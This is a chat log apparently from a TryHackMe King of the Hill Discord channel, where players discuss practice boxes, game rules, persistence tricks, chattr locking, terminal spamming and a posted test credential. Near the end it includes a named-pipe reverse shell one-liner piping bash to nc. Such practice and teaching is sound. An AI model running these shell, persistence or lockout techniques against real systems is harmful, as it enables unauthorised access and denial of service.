#koth
Could just go for some oreos right now
don't worry i don't Byte...
Amazingly, they are somehow vegan
that's right
@steep raptor game starts in 3 mins if ur joinin
dw
im slow asf
and if i aint done the box before
then ill be even slower
@steep raptor i joining?
ninja is in
;p
imma bout to get slapped by both of u
gl
It says people need to be subscribed to play Koth but I see people in public games that are not how is that possible?
🟥 - Get Root, 🟩 - Get King, 🟨 - Get in via SSH, 🟦 - Get Shell, 🟪 - Unknown ??? ?????? ???? ??
🟪 Space Jam Room
🟪 Tyler Room
🟨 Shrek Room
🟨 🟩 Production Room
🟦 Food Room
my-progress.txt
production unknown for me
@rugged pumice Food has changed
@runic river anyone can spectate games , but to play you need to be subscribed.
free to play weekends when
No yesterday it let me play 2 koth for free for some reason
@runic river that was a bug:)
@full grove rumor has it this weekend.
@quiet schooner changed how :?

I got so confused on the Tyler room
I guess xd
i have no idea how to get root
not me lol
cant even get to it
xD
someone just killed my script or someshit
i was in as root
ffs
xD
not me
legit just killed my script
was about to get king
xD
or try
lol
script not working now
someone either patched it or broke it lol
If it can't read the king, whoever was the last king get the point I think?
i think so
Yep
ffs
i cant get it ;/
neither
So I'm stuck as king basically
yep
is anyone root?
yh
me
i just tried
to change king
but its broke
can u delete king.txt and make a new one??
or against rules??
is someone hard spamming it ?
not me
You can delete and remake but it won't work
its legit broke
I'm not clearing it
Yep
if it resets, no 1 is getting root
i have the script ready mate
xD
im a noob tho
i dont even know the command to write in king.txt so i gotta BI it
VI
can we reset?
It's reset
reset time?
it has reset
it got reset ye
me neither
yikes ;/
@rugged pumice is it off for u too?
i cant ssh, well, its asking for a pass ;/
i can
reset the room again ;/
yh
yeah I got it
@void rivet It's not broken
password is NOT password
what if it is
no idea
legit askin me for a password
why is ssh asking for password when I have the id_rsa ;/
truu
Nah, all part of the game
no way ninja got in that fast ;/
The trick is maintaining persistence
yh, i would've got in if i didnt have to reset my vm
Especially in a way that no one expects, because otherwise they can counter it
Remember that root is God. Unless you can pull someone away from being root, that's you done for
if you have a reverse_shell in the machine and reset it, does it delete the reverse_shell?
yea :d
ninja how did you get in so fast after the reset lol
lucky i had to reset my VM xD
was fun tho
gg guys
am still gonna come 3rd ;/
guess thats good
i don't even know how to do that lol ;ddd
Fastest root in the west
Legit had my script at the ready but had to reset my VM
so far , I have not been able to get root on any machine
yh
my friend was guessing the password for 30mins
i got it in 5min
kinda a giveaway
@quiet schooner I just found a way to get shell on Food, but didn't have time to try other things ;d
@steep raptor lmao
@steep raptor Yep, that's the one I used yesterday too
ninja, is the pass for ssh brute-forcable ?
weirdChamp
@steep raptor DM me, I have a question
yea, friend you ninja
rush king and locked us out
No it's a serious question
lol
lol
join KOTH-1 would love to hear what you have to say
good
haha
I made it in a private game for fun
yh
Find it ruins the fun if you just auto pwn to root
yeah the script for shrek would do the following
Gain persistence and harden Donkey while providing a callback as root. Was aiming to get it so that it would generate root ssh keys and overwrite /etc/ssh/sshd_config to allow root sign in
thats just OP
But yeah given up on that now as it was fun but ruined it completely
Had it as a two part script in which I run one and it pulls my harden script which then removes sudoers, replaces ls, cat, echo and sudo with terminal parrot. Plants terminal parrot within users $PATH and then adds it to their bashrc
I need to get terminal parrot
Tbh I only know shrek and space jam
i like shrek
I've done food once and did alright but never took any notes, production and tyler I've only had once
can't get root on tyler
@lusty portal can u add the titles to the boxes so we can see which one it is
@dapper escarp think ive only got root on food and shrek
im kinda new to all this
so im kinda slow
Tyler is another level of weird
havent tried it
I gained user shell on two users, but the priv esc was just not having any of it
managed to get an autopwn for both but they're pretty useless
how long till start?
12min
I just clicked the link
oh lol
and it auto-joined me
ooooffff
gg wp
gg
@void rivet I submitted a flag, I saw there was a few minutes left so figured I'd see what I'd find 🤣
XD
I really want to do that room though
Seems like a lot of fun, but I need some time for sure.
Man kudos to you
Yeah that's actually pretty impressive!
takes some doing jumping into a koth style game mode and using it to learn
yh man
i came 3rd the game before
out of 5 or 6
was completely out of my depth on this one though
the privesc on that box is tough
or at least wasnt obvious
if one of the other holes are patched
I've heard about it, didn't experience it yet.
@dapper escarp @weary kindle can I pm you?
Go nuts
@dapper escarp do u recommend i do the rooms
and learn abit
and then come back to KOTH?
yes!
i've done a whole learning path and i'm still struggling ;/ ;d
there is a lot to learn
im not doing that bad tbh
truuu
It's not a bad idea tbh, the worst case scenario is you learn something
true
win win in my opinion
i like to go against people that are either at same level as me or just a bit better
Hopefully there will be a ranked system for it eventually at some point
cause if i go against someone like u just takes the motivation out of me cause ik i wont win lol
if it picks up a bit of speed
aha I wish, I have a long way to go and also have the issue of now people expect me to perform
You'll get there man, I have no doubt you'll be overtaking me in no time!
You're certainly in the right place
I think I may make a couple of youtube videos once this set retires properly on my strategies once I got into the box to harden it
yh man, thanks, imma start going through the rooms tomorrow
No more tyler
what's wrong with tyler ;/
It's hard
opsss, can't give hints
Yeah Tyler is that nice kind of brutal in which everyone has a chance
until one person cracks it I feel
@rugged pumice If you rooted it, you're doing better than everyone else
^^^^
For the third time in a row
Think I might do a couple of privates tomorrow and try fiddle with tyler
I seem to just keep getting shrek
it's cursed
It's like karma for making my script/one liners
@dapper escarp We got root baby
Nope
hmm I gotta look at that box
It's the only box I use my autopwn on and that's only to jump into user shells
note I don't submit flags when I use them
You may see me in public games with 0 points as I work on finding alternative methods into boxes
ninja can't join because it's already running, so i'm being put into other rooms
I think Dan rooted it last time I played with him
but kudos that box was something else
did you brute-force your way in? ;d
f
although im happy to give gentle pushes in the right direction
if that's allowed
there's multiple ways to skin this cat

slam face into keyboard == root
brb just gunna brute force a root pw
i meannnnnnnnnnnnnnnnnnn
I have rooted Tyler, got it on my first game. I agree with optional, really good box
i thought it was great as well
@pale mango here
Vir sec con ctf @cobalt jackal
@nova prawn i don't have Mic
ah ok xd
@steep raptor Hi , No mic
anyone who streams koth time to time except 0ptional?
yep
I'm sure there's more, check the TryHackMe section on twitch from time to time

Morning bois
Anyone up for a koth?
@lusty portal can u make it so we can see what box we are going to be doing while it's counting down?
Its chosen 1 minute before starting
Ahh ok
I can make it show once the game has started?
im ready
Alright I'm just gonna get out of bed and throw some water on my face
hahaa
@void rivet Can I join as well?
@gusty cradle where ?
He has not sent the link yet
Yh sure
he wants go to sleep
oh good
Just going to get in the shower and ill be ready
private room ?
Probably public
Do points earned on koth go onto ur points on ur account?
No
Alright
Ready guys ?
I'm ready
Almost
Went to bed at 5am
So got up late today
Turning pc on now
bootin up vm
anyone else joining VC??
I can join
yh ok
I hope we get Shrek
lol
i dont
cause i only know 1 way to get the file i need
and i dont have that setup now
Start the match and post the invite link here
bout to now
i want a box i havent done before
no point doing the same box over and over again
yesssss
Skidy u wanna join in on this ? ;p
@void rivet Fixing Path loading speed atm
So will pass
I will play on the new boxes mind
alright
@distant zealot https://tryhackme.com/games/koth/join/ddf966d0cc73f2ccf0a90696
@lusty portal Skiddy playing! what?
my subscribe dead today Hahaa
very cheeky
did someone break the ssh??
big f
why does my vpn always fuck up so im always late xD
Yeah, someone broke ssh
ooof
tarasz 100%
me 2
@jolly parcel Dude, stop it! You're spamming ssh
reset box xD
ohh ;d
sorry, ran by mistake all scripts from file
Don't do it again
can anyone connect yet??
everytime the box resets i have to restart my vm cause i get no connection
;/ again
again what??
you have to restart your vm
my connection is fucked
re-gend a new vpn
restarted vpn
not working
big f for me
anyone else doing a box rn
send me an inv
hard f, tarasz locked it down i think ;d
i never got a chance to get in
cause i couldnt connect
tarasz have u got an auto script??
did you run some kind of script cuz when i got it, it was very laggy ;/
dude, I am playing this second day, I haven't got a time to create some auto scripts
for machine
just a few to get persistence
@rugged pumice nothing besides cronjobs
I am still new here, so maybe I missed some rules. It is allowed to patch found vulnerabilities, right?
@rugged pumice yeah, 1 cronjob
the box is so laggy
Why does it return segfault
i shutdown my vm completely
regend my vpn
cant connect
think the box just dont like me rn
cpu 100%, ram 100%, disk 100%
it has to be 1 or 2 of the above
because even the web server can't load
so something is draining resources
i cant connect to ftp or ssh
where do you see cpu 100%???
Don't restart
no i'm not seeing it, but there has to be something running at 100%
nothing load
it just hangs
i will not restart, sorry, i checked all ports and it works okay
if u didnt flood the ssh first we wouldnt have had to restart in the first place ;p
is ssh flood disallowed in rules? I can't see it
isn't flooding == dos :?
O_o
well, okay, maybe. I ran it by mistake in a loop. now i don't
I can confirm that machine is rootable now as I didn't patch all services. I am not sure if it is allowed
there are multiple ways to root this box
no im testing if the service is running
telnet wasn't working for me from the start, idk what's the problem
i'm not using telnet to connect, just to test if the service is running
I believe, it is allowed
Stop killing my shell
@gusty cradle
You would be correct. Shell killing is 100% allowed
i will switch now to another game so you have a chance to get root:)
i've never played this 1
me too
what one is it
michael jordan :?
ah
me three
ive seen this one
never done it though
how u get king that quick?
u done this before?
legit have no idea with this one
@weary kindle can i pm you?
no idea how to do this one
Is it supposed to return segfault?
what returns segfault?
I'll pm you
few ways :D
i can't even find 1 ;ddd
can u brute force password for ssh?
@jolly parcel Good game, guess I'll have to settle for second position
i got so happy when i found a /flag/ extension
but nothin is there
tara
i checked a port
and found ur name
;p
oops
hehe
so u patched that port yh??
im guessing it had somethin on it
like a password or somethin
u just kicked me out xD
@rugged pumice hes patched it all
I believe, rules page is too small. If patching is allowed what is considered as patching? rotating keys, removing functionality, stopping services. There is no clear description what services should work and how
Not everything is allowed
rlly??
oh yh obvs
You can not use iptables to block all connections except yours
In terms of patching stuff, you're not allowed to just blanket restrict everything ^^
Port 9999 must stay up
I wanted to do that so badly
But other than that, enjoy
so I can just stop all other services? rly?
So can we delete things that are needed for foothold?
Yeah, that may or may not have been my suggestion when Koth was suggested. Hence it being banned
I believe so, yes
That's just good patching
I'll block ssh next time
It's why there are so many footholds -- to make it unlikely that you can patch them all
lol
Just remember that if you turn off all services, you're gonna kill your own connection too
Gotta be smart about it
Nah, I'll upload my keys to authorized_keys modify ssh service and boom
but nothing stops me from allowing ssh only for root with my key
Modify? That'd do it (unless someone else is already in and overwrites your key before you finish modifying)
Probably best to setup more persistence than that, but yes
I have a script that enters my name into king.txt every minute
Every minute? Try 100 times a second 🤣
xD
I have a lovely one liner to constantly do that, whilst simultaneously keeping anyone else from modifying the file at all
so technically ssh flood is allowed? that's just the same as turning off ssh
Yeah, but more complicated than that
@void rivet are services slow for you?
yh
Just using chattr is easy for everyone to use
Not everyone is familiar with chattr and it's easy to reverse
Precisely
Is SSH flooding allowed?
With the oneliner I've got up my sleeve? It's significantly harder to reverse...
flooding == dos, i hope 'not'
@gusty cradle I would imagine not, to be honest, just in case you DOS the thing
How about spamming others users input?
I mean, JH did do that during the stream
nasty nasty, but the good kind
Oh, yes! Now to find a binary file to spam
/*
I've almost got a script to do that which will be unbeatable, and leave me a nice loophole to never affect myself
Just doesn't quite work yet
does it filter out the input, or does it not send to yourself?
what is the actual room name that has port 80 -> Michael Jordan
Spacejam
probably space jam

It sends it to any tty owned by a connection from an IP that isn't my own @rigid raptor
it is spacejam
So if we somehow spoof your ip?
Right, so avoiding. I was wondering if you were being clever somehow. Probably best to keep it simple
Good luck with that -- the VPN will throw a fit, but yeah, theoretically
exactly
spoofing ips work better if you've got control of something between the two endpoints. And since you're not allowed to attack the other players, that's going to be difficult
^^
I mean, it would be pretty fun to have a router or switch in the loop
Only easy way to do it would be by nicking my config file, which a) ain't allowed, b) would be very difficult and c) would throw the VPN into a hissy fit
yeah, cause two connected at the same time
@terse willow Can I PM you? I think I got a nasty defence tactic in mind, but I'm not sure if it's a little too nasty. But if it isn't, I'd rather not give it away just yet :p
@terse willow Are we allowed to create fake flags to confuse people?
lmao
I'm gonna go create a fake flag generator
Thank god I saved some flags!
I'm gonna create fake ones based on that
@lusty portal Can I PM you? Muri asked me to divert a rule decision to you. It's regarding an idea to keep other players out once you get in, but we can't decide if it's a bit too evil :p
@rigid raptor yeah sure
@gusty cradle please dont use ur flag gen on me rn xD
@gusty cradle do it
No promises
xD
RIP me
my vpn broke again
lol
this is weird
u got a 4 min headstart now
why does this always happen xD
Keep it PG13 @void rivet ๐
"oof" shouldn't be allowed in PG13, i swear
We got tyler
as annoying as hall
@gusty cradle we are not having any luck are we
I got some creds
F for me
Got shell
Got Milk?
im trying but it aint workin for me lol
i am joining
KoTH machines shouldn't run slow?
they did earlier
there was 2
Tyler
If anyone else reports this I will bump the resources
for me it worked ok, don't know what was the problem for you
You guys using the IP VPN too?
How many flags are there on Tyler?
my shell doesnt wanna work for some reason lol
Its the hardest KoTH box
hey guys any tryhackme mod/support than can answer a question about the new koth stuff?
I mean probably
@quiet schooner can i dm u
nahhh i dont want a hint aha
Okie:)
wanna find it myself otherwise feel like ive cheated
ik how to get it
but my shell isnt working
I have root but not user
no spoilers
ohh sorry
Maybe
yh mine aint working ive done something wrong
@quiet schooner I think it's a container or something
is it like a docker?
Can't say
Whoever made Tyler is very evil. I have root but I can't find user
|| You've been honeypotted, you don't have root. || Spoiler, but it's worth it for your sanity
np
Noooooooooooooooooo!
I do actually have root tho
Right, I'm gonna hop into my VM and play a few games
@weary kindle hit that stream up
effort tho
Always fun watching you guys stream
couldn't be bothered to wait 20 minutes
nope
how we can see stream ? @stable narwhal
Oh Dan is sharing his screen
Optional and myself will also be streaming throughout the day, just we're on twitch typically
@distant zealot, follow optional or Sherlock on Twitch
Just gonna leave me out there? ;P @stable narwhal
Soz @mellow bough didn't mean to haha
haha all good
Follow DarkStar/TryHackMe on Twitch too
but all of the above first
Follow dark for tutorials on how to be defeated by an almighty zip file
As seen on agent sudo last night
optional, are you still streaming UoP stuff today?
Sorry man, something came up today so won't be able to
@mellow bough guilty!
Are 'myalt' or 'stivanradev' in the Discord?
both are me
KOTH requires 2 players in lobby.
so having 2 accounts allows me to play privately
without rushing for points,etc
also I can test my blue skills
ohh
JohnHammond made a youtube video about it
Shouldn't this be removed by now?
Oh no, we're still in beta. This is a public release of the beta, the rules/game is still subject to some change
Oh, okay, what about the second part? Pretty much anyone that's subscribed can create a game
Oh the only restriction is that it won't let you join depending on the experience level you have selected on your profile I think
Thank you for telling me, by the way you guys have a great platform, and the community here is really friendly, keep up the good work!
You're welcome and thanks!
will hop in!
welp, what box is this?
@rugged pumice can i get spectator link pls
you can join here 1 min
or watch https://tryhackme.com/games/koth/169
I feel as Paradox, you and I have to duel at some point @void rivet
im new to all this dude theres no point u will win xD
Hahah
@rugged pumice what box u on
@dapper escarp no worries! More just something to watch to pass time aha
I stopped you now, for sure?
we'll see
https://tryhackme.com/games/koth/169 @void rivet
Should be up tomorrow. Gunna do some pwk then stream in the evening I think
oh wow
lol
@vagrant monolith What?
@fair adder keeps on fighting back and I have no idea how
@vagrant monolith Did you use chattr?
Yes
yes he did
Did you uninstall the package
he did not
Haha
OH
Then why does chattr not work anymore?

lololol
was it that food box?
i know what he did
Somehow @fair adder still manages to change the file sometimes
He can not fight both of us
wooooooooooow
There is a way to reverse chattr permissions but its not working right now
you too!
Thanks! Love this game mode
yeah it's a lot of fun
will you play another one?
im down as long as @vagrant monolith doesnt grief me the whole time LOL
Hahaha
jk
I need to go to sleep
name of the game
Good luck!
join public if you're game
@ember agate May I join?
@ember agate @nova prawn @fair adder join voice channel
oh lol
voice
@steep raptor You're loving these KoTH games:)
hello once again @void rivet
;*
lets hope my vpn doesnt end itself
like its been doing all day
glhf
thats the only box idk how to do
printf 'oldpass\nNewPass\nNewPass\n' | passwd
<newpassword> would be a pretty good password
using burpsuite how can i look at incoming pings/traffic?
if im allowed to ask
if im not allowed to ask then sorry
whatcha mean
i dont think u can tell me because its something to do with a box
You'd have to route incoming traffic through burp, which takes a little more work than telling the browser to proxy through burp, and I don't know if burp allows that sort of shenanigans in the first place. You should just use a different tool for incoming traffic. If nothing else, tcpdump
@void rivet You enjoying the patch?
pasta:123123123
guessin pasta is a user
it's always u:p
@void rivet user:pass
kek you either mistyped it or someone changed it from when suitguy set it, or he was trolling
O_o
says permission denied lol
been locked out aint i
xD
or its wrong
@meager cloak ur mean, thought i was bout to get somewhere xD
It's 100% the password for pasta ssh
mknod "/dev/shm/.pipe" p; cat "/dev/shm/.pipe" | /bin/bash -i 2>&1 | nc 127.0.0.1 12345 >"/dev/shm/.pipe"
any difference between mknod p and mkfifo?
mkfifo is mknod <file> p
mknod is a named pipe
Figured, but wanted to make sure
can u explain that to me cause i dont wanna just use it without knowing what it does, wanna learn aha
man mknod
D'you know what a FIFO is @void rivet?
nope
Have you used a pipe command before?
it's basically just | but instead of the symbol it's a file
oh ok
That ^^
It's a file that has an input and an output. You can't read from it unless something is being written out, and vice versa
and no i havent, im new to all this and trying to learn from doing koth's
That makes it really good for reverse shells
because the data has to go in a loop a | b | c | a